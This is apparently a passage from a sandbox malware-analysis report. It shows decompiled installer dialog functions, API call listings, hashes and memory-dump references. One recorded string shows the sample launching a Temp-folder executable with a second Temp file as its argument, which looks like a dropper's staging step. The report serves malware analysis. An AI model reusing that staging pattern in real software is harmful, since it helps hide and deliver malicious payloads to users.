				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32 ref: 004058B3
GetSystemMetrics.USER32 ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32 ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32 ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32 ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32 ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32 ref: 00404C28
SetDlgItemTextW.USER32 ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32 ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E

Strings

A, xrefs: 00404BD8
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 00404C16, 00404C1B, 00404C26
H7B, xrefs: 00404BB2

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$A$H7B
API String ID: 2624150263-1767363290
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
